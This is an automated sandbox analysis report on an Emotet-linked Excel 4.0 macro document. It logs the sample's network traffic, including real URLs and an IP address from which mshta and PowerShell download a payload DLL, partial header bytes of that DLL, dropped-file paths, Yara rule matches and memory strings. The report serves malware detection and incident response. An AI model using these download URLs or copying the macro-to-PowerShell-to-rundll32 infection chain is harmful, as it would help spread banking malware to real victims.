            Source: global trafficHTTP traffic detected: GET /wp-content/gF1nMkOSsT0Jq/ HTTP/1.1Host: www.catholicroundup.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/ HTTP/1.1Host: schedu.teicrete.grConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
            Source: Joe Sandbox ViewIP Address: 212.237.17.99 212.237.17.99
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.4.6 (Ubuntu)Date: Thu, 23 Dec 2021 03:04:07 GMTContent-Type: application/x-msdownloadContent-Length: 536576Connection: keep-aliveX-Powered-By: PHP/5.5.9-1ubuntu4.29Set-Cookie: 61c3e727b7489=1640228647; expires=Thu, 23-Dec-2021 03:05:07 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Thu, 23 Dec 2021 03:04:07 GMTExpires: Thu, 23 Dec 2021 03:04:07 GMTContent-Disposition: attachment; filename="TjTDQY4hd.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 0a 00 e3 0b c3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 42 04 00 00 e6 03 00 00 00 00 00 64 4a 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 98 80 05 00 c2 03 00 00 5a 84 05 00 b4 00 00 00 00 40 06 00 10 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 54 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 3c 05 00 18 00 00 00 98 c7 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 08 88 05 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 41 04 00 00 10 00 00 00 42 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e8 58 01 00 00 60 04 00 00 5a 01 00 00 46 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 25 00 00 00 c0 05 00 00 16 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 f0 05 00 00 02 00 00 00 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 66 61 78 74 00 00 00 1c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 08 00 00 00 00 10 06 00 00 02 00 00 00 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 20 06 00 00 02 00 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6f 6c 74 62 6c 00 81 02 00 00 00 30 06 00 00 04 00 00 00 be 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 72 73 72 63 00 00 00 10 3e 02 00 00 40 06 00 00 40 02 00 00 c2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 2d 00 00 00 80 08 00 00 2e 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@
            Source: global trafficHTTP traffic detected: GET /pp/oo.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.251.86.178Connection: Keep-Alive
            Source: unknownNetwork traffic detected: IP country count 20
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: unknownTCP traffic detected without corresponding DNS query: 87.251.86.178
            Source: mshta.exe, 00000003.00000003.409646129.000000000039C000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.414948487.000000000039D000.00000004.00000001.sdmp, mshta.exe, 00000003.00000002.416713796.000000000039D000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comOb equals www.linkedin.com (Linkedin)
            Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: mshta.exe, 00000003.00000003.409646129.000000000039C000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.414948487.000000000039D000.00000004.00000001.sdmp, mshta.exe, 00000003.00000002.416713796.000000000039D000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178
            Source: powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.671551800.000000001B871000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178/pp/PP.PNG
            Source: powershell.exe, 00000005.00000002.670096499.000000000362F000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178/pp/PP.PNGPE3
            Source: mshta.exe, 00000003.00000002.416686072.000000000036E000.00000004.00000020.sdmp, mshta.exe, 00000003.00000003.416139999.0000000003E35000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.html
            Source: mshta.exe, 00000003.00000003.409646129.000000000039C000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.414948487.000000000039D000.00000004.00000001.sdmp, mshta.exe, 00000003.00000002.416713796.000000000039D000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.html...Ab
            Source: mshta.exe, 00000003.00000002.416845514.00000000005E4000.00000004.00000040.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.html7Bp4
            Source: mshta.exe, 00000003.00000002.417491863.0000000003E35000.00000004.00000001.sdmp, mshta.exe, 00000003.00000003.416139999.0000000003E35000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.htmlC:
            Source: mshta.exe, 00000003.00000002.416667688.0000000000330000.00000004.00000020.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.htmlWinSta0
            Source: mshta.exe, 00000003.00000003.409657707.00000000003AF000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.htmlZM
            Source: mshta.exe, 00000003.00000003.411447891.0000000003085000.00000004.00000001.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.htmlhttp://87.251.86.178/pp/oo.html
            Source: mshta.exe, 00000003.00000002.416686072.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.htmll
            Source: mshta.exe, 00000003.00000002.416686072.000000000036E000.00000004.00000020.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.htmllA
            Source: mshta.exe, 00000003.00000002.416667688.0000000000330000.00000004.00000020.sdmpString found in binary or memory: http://87.251.86.178/pp/oo.htmlmshta
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://angel.bk.
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://angel.bk.idv.tw/web_image
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://angel.bk.idv.tw/web_images/vB5Enm5Ciwr8/
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://angel.bk.idv.tw/web_images/vB5Enm5Ciwr8/PE3
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://econews.s
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://econews.site/content/page
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/PE3
            Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://schedu.te
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://schedu.teicrete.gr
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://schedu.teicrete.gr/moodle
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://schedu.teicrete.gr/moodle/report/trainingsessions/xdxd3Jt
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://schedu.teicrete.gr/moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://schedu.teicrete.gr/moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/PE3
            Source: mshta.exe, 00000003.00000002.418147113.0000000004990000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.665291877.0000000002410000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://sssilkplaster.in/argyrose
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/PE3
            Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: mshta.exe, 00000003.00000002.418147113.0000000004990000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.665291877.0000000002410000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://www.catholicroundup.com
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://www.catholicroundup.com/w
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/
            Source: powershell.exe, 00000005.00000002.670218850.0000000003781000.00000004.00000001.sdmpString found in binary or memory: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/PE3
            Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: mshta.exe, 00000003.00000002.417878449.0000000004697000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.578039749.0000000002097000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.665234852.0000000001F07000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: mshta.exe, 00000003.00000002.417637161.00000000044B0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.577871935.0000000001EB0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.co
            Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/c
            Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: powershell.exe, 00000005.00000002.664760996.000000000023E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: mshta.exe, 00000003.00000003.416147264.0000000003E75000.00000004.00000001.sdmpString found in binary or memory: http://www.protware.com
            Source: mshta.exe, 00000003.00000003.409682749.00000000003D4000.00000004.00000001.sdmpString found in binary or memory: http://www.protware.comGj
            Source: rundll32.exe, 0000000A.00000002.664941661.0000000001D20000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8624E0FD.pngJump to behavior
            Source: unknownDNS traffic detected: queries for: www.catholicroundup.com
            Source: global trafficHTTP traffic detected: GET /pp/oo.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.251.86.178Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /pp/PP.PNG HTTP/1.1Host: 87.251.86.178Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wp-content/gF1nMkOSsT0Jq/ HTTP/1.1Host: www.catholicroundup.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /moodle/report/trainingsessions/xdxd3JtJs4qRKlVX/ HTTP/1.1Host: schedu.teicrete.grConnection: Keep-Alive
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            E-Banking Fraud:

            barindex
            Yara detected EmotetShow sources
            Source: Yara matchFile source: 8.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.577830349.0000000000602000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.577733868.0000000000180000.00000040.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Powershell drops PE fileShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\ssd.dllJump to dropped file
            Found Excel 4.0 Macro with suspicious formulasShow sources
            Source: ggnlRjkfr4.xlsInitial sample: EXEC
            Source: ggnlRjkfr4.xlsInitial sample: EXEC
            Source: ggnlRjkfr4.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
            Source: ggnlRjkfr4.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019CFAA8_2_0019CFAA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018D1FD8_2_0018D1FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019BE1F8_2_0019BE1F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00184A138_2_00184A13
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001960158_2_00196015
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018FE158_2_0018FE15
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018F2178_2_0018F217
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001826178_2_00182617
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019000D8_2_0019000D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A0C0C8_2_001A0C0C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001828008_2_00182800
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018BC078_2_0018BC07
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00187E3E8_2_00187E3E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A10338_2_001A1033
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00190C2F8_2_00190C2F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018DC248_2_0018DC24
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019EC5A8_2_0019EC5A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001886508_2_00188650
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001856518_2_00185651
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001976798_2_00197679
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00182C798_2_00182C79
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019B2788_2_0019B278
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018C87E8_2_0018C87E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019C47E8_2_0019C47E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018C29B8_2_0018C29B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019A2888_2_0019A288
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001936828_2_00193682
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A02B38_2_001A02B3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00199EB58_2_00199EB5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018A4AA8_2_0018A4AA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019D8AD8_2_0019D8AD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019F0A78_2_0019F0A7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A2EA48_2_001A2EA4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00190ED98_2_00190ED9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001908D98_2_001908D9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019B6DB8_2_0019B6DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018CADE8_2_0018CADE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001844D28_2_001844D2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00196ACA8_2_00196ACA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001888FC8_2_001888FC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00191EFC8_2_00191EFC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018D8F08_2_0018D8F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018A6F78_2_0018A6F7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001860E88_2_001860E8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018D4EE8_2_0018D4EE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00181EE28_2_00181EE2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019E2E48_2_0019E2E4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019A7128_2_0019A712
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001823178_2_00182317
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019F90C8_2_0019F90C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019EB0F8_2_0019EB0F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A07018_2_001A0701
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019713E8_2_0019713E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001879318_2_00187931
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00193B368_2_00193B36
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00194F2A8_2_00194F2A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019FB228_2_0019FB22
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018C5518_2_0018C551
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001875498_2_00187549
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019514C8_2_0019514C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018CD428_2_0018CD42
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001923788_2_00192378
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019177E8_2_0019177E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00181B708_2_00181B70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00188B748_2_00188B74
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018416C8_2_0018416C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A196C8_2_001A196C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018E16F8_2_0018E16F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019C9628_2_0019C962
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018BD638_2_0018BD63
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A05888_2_001A0588
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019058C8_2_0019058C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A31BA8_2_001A31BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001865BD8_2_001865BD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00189DA88_2_00189DA8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018A1AA8_2_0018A1AA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A1FA68_2_001A1FA6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001893A78_2_001893A7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018ADD98_2_0018ADD9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018B9D58_2_0018B9D5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001A27CB8_2_001A27CB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001965CD8_2_001965CD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00188FCE8_2_00188FCE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00197FFB8_2_00197FFB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00193FF38_2_00193FF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018FBF78_2_0018FBF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001979EC8_2_001979EC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001857E68_2_001857E6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_7299D9A08_2_7299D9A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B93848_2_729B9384
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B03D08_2_729B03D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729D33F88_2_729D33F8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A33208_2_729A3320
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A60108_2_729A6010
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729AA6C08_2_729AA6C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B87CF8_2_729B87CF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729D34B28_2_729D34B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729C55D98_2_729C55D9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729CE5F38_2_729CE5F3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A65008_2_729A6500
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729B08808_2_729B0880
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729BA8178_2_729BA817
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_729A1ED08_2_729A1ED0
